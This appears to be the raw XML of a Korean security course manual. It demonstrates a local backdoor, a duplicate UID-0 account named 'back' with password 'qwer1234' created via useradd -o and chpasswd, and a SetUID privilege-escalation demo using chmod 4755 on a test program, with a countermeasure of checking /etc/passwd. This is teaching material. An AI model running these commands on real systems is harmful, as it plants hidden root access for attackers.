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 w:rsidP="00836B5D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 w:rsidP="00836B5D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836B5D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843B362" w:rsidR="00435F8A" w:rsidRPr="00DE047E" w:rsidRDefault="00435F8A" w:rsidP="00836B5D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BD66271" w:rsidR="00435F8A" w:rsidRPr="001F0BA1" w:rsidRDefault="0079744A" w:rsidP="00836B5D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최종프로젝트 매뉴얼 양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1FBA1140" w:rsidR="00810D7F" w:rsidRPr="00810D7F" w:rsidRDefault="00707ECA" w:rsidP="00836B5D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proofErr w:type="spellStart"/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백도어</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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36B5D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 w:rsidP="00836B5D"/>
    <w:p w14:paraId="674AA210" w14:textId="353823D8" w:rsidR="00DE047E" w:rsidRDefault="00DE047E" w:rsidP="00836B5D"/>
    <w:p w14:paraId="45C3DBC0" w14:textId="05D23D21" w:rsidR="00DE047E" w:rsidRDefault="00DE047E" w:rsidP="00836B5D"/>
    <w:p w14:paraId="688F1889" w14:textId="77777777" w:rsidR="00DE047E" w:rsidRDefault="00DE047E" w:rsidP="00836B5D"/>
    <w:p w14:paraId="17464253" w14:textId="77777777" w:rsidR="00ED11CF" w:rsidRDefault="00ED11CF"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1F0BA1" w14:paraId="1ECED905" w14:textId="77777777" w:rsidTr="002761E0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35299502" w:rsidR="001F0BA1" w:rsidRPr="001F0BA1" w:rsidRDefault="001F0BA1" w:rsidP="00836B5D">
            <w:pPr>
              <w:ind w:right="960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lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Local </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>백도어</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>passwd백도어</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX인생극장B" w:eastAsia="DX인생극장B" w:hAnsi="DX인생극장B" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w14:paraId="1F0494B8" w14:textId="77777777" w:rsidTr="002761E0">
        <w:trPr>
          <w:trHeight w:val="312"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="39AE6F41" w14:textId="3FE0B258" w:rsidR="00707ECA" w:rsidRPr="00707ECA" w:rsidRDefault="00707ECA" w:rsidP="00836B5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>- 관리자 계정을 생성하여 다시 접속할 때 사용</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="288C0766" w14:textId="73EEE6DA" w:rsidR="001F0BA1" w:rsidRPr="00707ECA" w:rsidRDefault="00707ECA" w:rsidP="00836B5D">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>- 관리자 계정으로만 가능하다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w14:paraId="5BAB6D7D" w14:textId="06E6A203" w:rsidTr="002761E0">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10902" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16E68E8F" w14:textId="0E80E7B6" w:rsidR="001F0BA1" w:rsidRDefault="001F0BA1" w:rsidP="00836B5D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58E1FB05" w14:textId="29B13667" w:rsidR="003D753D" w:rsidRPr="00B67587" w:rsidRDefault="00B67587" w:rsidP="00836B5D">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B67587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>*</w:t>
            </w:r>
            <w:r w:rsidRPr="00B67587"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 xml:space="preserve">** </w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA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>공격자는</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA"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 xml:space="preserve"> 관리자계정으로 접속 후 필요한 백도어</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA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>계정을</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA"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 xml:space="preserve"> 만들었다고 가정</w:t>
            </w:r>
            <w:r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>***</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001F0BA1" w14:paraId="16CF0060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11C9FCEE" w14:textId="77777777" w:rsidR="001C4D99" w:rsidRDefault="00707ECA" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11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공격자는 관리자계정으로 접속 후 필요한 백도어를 만들었다고 가정 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14BF62E2" w14:textId="622DCACD" w:rsidR="00707ECA" w:rsidRPr="001C4D99" w:rsidRDefault="00707ECA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localhost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serad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-o -u 0 back</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D41371F" w14:textId="77777777" w:rsidR="00707ECA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07ECA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root@localhost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707ECA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echo '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back:qwer1234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' | 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chpasswd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="19EC4A86" w14:textId="77777777" w:rsidR="00707ECA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입력한값을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gram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비밀번호를 변경하는 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chapasswd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명령에 전달</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F3BB3E" w14:textId="77777777" w:rsidR="00707ECA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707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>// -</w:t>
            </w:r>
            <w:proofErr w:type="gram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o 옵션으로 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중복 허용</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5962F4B7" w14:textId="77777777" w:rsidR="00707ECA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07ECA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root@localhost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707ECA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cat /</w:t>
            </w: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>/passwd | grep back</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573491EC" w14:textId="4452FD5A" w:rsidR="00BE7966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back:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>x:0:1030</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>::/home/back:/bin/bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="5E0A041F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243345D0" w14:textId="247CDAB1" w:rsidR="00BE7966" w:rsidRPr="00BE7966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DE8F71" wp14:editId="4931C568">
                  <wp:extent cx="3990975" cy="4572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7279AE91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1A3C2238" w14:textId="1291E510" w:rsidR="00707ECA" w:rsidRPr="00707ECA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E7966">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">② </w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>공격자는</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 자신의 일반계정으로 접속한 다음</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4078B9B8" w14:textId="0FF990D8" w:rsidR="00BE7966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07ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>su</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 명령어로 관리자 권한(0)으로 생성된 계정(back) 접속</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="4766BEA3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2792D79F" w14:textId="020D5754" w:rsidR="00BE7966" w:rsidRPr="00BE7966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602FCBA3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69F991EB" w14:textId="161764EE" w:rsidR="00707ECA" w:rsidRPr="00707ECA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E7966">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>③</w:t>
            </w:r>
            <w:r w:rsidR="00707ECA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707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29F2BC55" w14:textId="265FCCE6" w:rsidR="00BE7966" w:rsidRPr="00707ECA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07ECA">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt; 일반계정에서 백도어로 관리자계정(back)에 접속하여 root만이 접근 가능한 파일 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="2613EABE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48600105" w14:textId="3C96957F" w:rsidR="00BE7966" w:rsidRPr="00BE7966" w:rsidRDefault="00707ECA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F1F556" wp14:editId="185DDA08">
                  <wp:extent cx="6645910" cy="2049145"/>
                  <wp:effectExtent l="0" t="0" r="254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4D567CA4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4A377A2A" w14:textId="47859690" w:rsidR="00BE7966" w:rsidRPr="00BE7966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1DA7206A" w14:textId="6AEDEE2C" w:rsidR="00BE7966" w:rsidRPr="00BE7966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3873B613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3144D387" w14:textId="684951D7" w:rsidR="00BE7966" w:rsidRPr="00BE7966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책방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="5A05851E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2F6BEA3A" w14:textId="6DECE38A" w:rsidR="00BE7966" w:rsidRPr="00BE7966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-주기적으로 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passwd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의 주기적인 확인을 통해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가 중복이 되는 계정이 있는지 체크한다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FEA9BD9" w14:textId="4200FDFF" w:rsidR="00836B5D" w:rsidRDefault="00836B5D"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92491B2" wp14:editId="6BBB90D0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>68580</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-224790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="9734550"/>
                <wp:effectExtent l="0" t="0" r="9525" b="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01FD" id="직사각형 66" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:5.4pt;margin-top:-17.7pt;width:533.25pt;height:766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24950B0C" w14:textId="77777777" w:rsidTr="002761E0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2F66A592" w:rsidR="00BE7966" w:rsidRPr="0050741D" w:rsidRDefault="00CD7C05" w:rsidP="00836B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72C65BA" wp14:editId="719D1A4F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-285750</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="10201275"/>
                      <wp:effectExtent l="0" t="0" r="9525" b="952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20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C6BA" id="직사각형 7" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:-.15pt;margin-top:-22.5pt;width:533.25pt;height:80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707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">Local </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA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707ECA" w:rsidRPr="00707ECA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A2AA2">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>SetUID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00707ECA" w:rsidRPr="00707ECA">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>를 이용한 권한 상승</w:t>
            </w:r>
            <w:r w:rsidR="00DA2AA2">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7966" w14:paraId="61F3B49C" w14:textId="77777777" w:rsidTr="002761E0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108BE598" w14:textId="4B2EA59E" w:rsidR="00B67587" w:rsidRPr="00BE7966" w:rsidRDefault="00B67587" w:rsidP="00836B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41FE8A28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710485A2" w14:textId="77777777" w:rsidR="001C4D99" w:rsidRDefault="001C4D99" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9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root 계정으로만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passwd </w:t>
            </w:r>
            <w:r w:rsidRPr="001C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>변경가능 확인</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="042D9E07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id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651414EF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=0(root) gid=0(root) groups=0(root) context=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nconfined_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u:unconfined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_r:unconfined_t:s0-s0:c0.c1023</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4E73FCF9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which passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BCC8BA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/bin/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F6D7378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ls -l /bin/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14F38BA7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wsr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-x. 1 root root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27856  8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월  9  2019 /bin/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E413CF7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passwd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ser1</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="07CCAB85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ser1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사용자의 비밀 번호 변경 중</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51DCD459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C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>새</w:t>
            </w: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암호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:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FCB3BAB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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>잘못된</w:t>
            </w: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암호: 암호는 8 개의 문자 보다 짧습니다</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52BCC0B9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C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>새</w:t>
            </w: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암호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재입력:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E3A5C7D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passwd: 모든 인증 토큰이 성공적으로 업데이트 되었습니다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FFAF4BD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logout</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="298BBB85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passwd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ser1</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5017F428" w14:textId="70A5B461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passwd: root로만 사용자 이름을 지정할 수 있습니다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050741D" w14:paraId="467686C4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70F37258" w14:textId="2005EFFE" w:rsidR="0050741D" w:rsidRPr="00BE7966" w:rsidRDefault="0050741D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2AFF79F2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0A5CF3BE" w14:textId="65C2D54A" w:rsidR="003D753D" w:rsidRPr="00BE7966" w:rsidRDefault="003D753D" w:rsidP="00836B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458B242A" w14:textId="77777777" w:rsidR="0050741D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가 설정된 경우와 아닌 경우를 테스트</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4ECC2F38" w14:textId="77777777" w:rsidR="001C4D99" w:rsidRPr="001C4D99" w:rsidRDefault="001C4D99" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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 w:hint="eastAsia"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>코드</w:t>
            </w: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및 실행파일 생성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3C4F63" w14:textId="77777777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8D34EF8" w14:textId="46BE4CDA" w:rsidR="001C4D99" w:rsidRPr="001C4D99" w:rsidRDefault="001C4D9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getuid.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C4D99" w14:paraId="1C707109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740E61C5" w14:textId="6ACE689D" w:rsidR="001C4D99" w:rsidRPr="001C4D99" w:rsidRDefault="001E0EEF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#</w:t>
            </w:r>
            <w:r w:rsidR="001C4D99" w:rsidRPr="001C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">vim </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="001C4D99" w:rsidRPr="001C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>getuid.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="66C9A8C4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F93627E" w14:textId="52961758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stdio.h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44363B17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main(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6F85A77C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>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AFFA7F5" w14:textId="630A7956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int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3CDB6E32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get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()</w:t>
            </w:r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; /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/현재 상태의 Real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값을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읽어옴</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5025D7DD" w14:textId="23DDC770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gete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56D718F8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printf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"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: %d\n",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14E5BA36" w14:textId="77777777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1C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>printf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1C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>"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: %d\n", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001C4D99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1C4D99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176C113C" w14:textId="77777777" w:rsid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 w:rsidRPr="001C4D99">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">        return 0;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="373C3956" w14:textId="06020AFC" w:rsidR="001C4D99" w:rsidRPr="001C4D99" w:rsidRDefault="001C4D99" w:rsidP="00836B5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hint="eastAsia"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C4D99" w14:paraId="06F6703B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49CE35E5" w14:textId="47472A03" w:rsidR="001C4D99" w:rsidRPr="001E0EEF" w:rsidRDefault="001E0EEF" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">일반 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>퍼미션인</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 상태에서 계정별로 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 파일 실행</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="4BB90177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4DD8FC7" w14:textId="48B7927F" w:rsidR="002761E0" w:rsidRDefault="002761E0" w:rsidP="00836B5D">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 실행파일에 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0EEF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1E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> 설정 후 실행</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4533CB0A" w14:textId="77777777" w:rsidR="002761E0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hmo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4755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getuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="71CC7532" w14:textId="4D573C60" w:rsidR="002761E0" w:rsidRPr="001E0EEF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E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt; 파일의 소유주(root, 0) 권한으로 실행되었으므로</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001E0EEF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1E0EEF">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>가 0이다.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002761E0" w14:paraId="368DE54A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46ED11E8" w14:textId="744735FD" w:rsidR="002761E0" w:rsidRDefault="002761E0" w:rsidP="00836B5D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="666666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- root 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일반</w:t>
            </w:r>
            <w:r>
              <w:rPr>
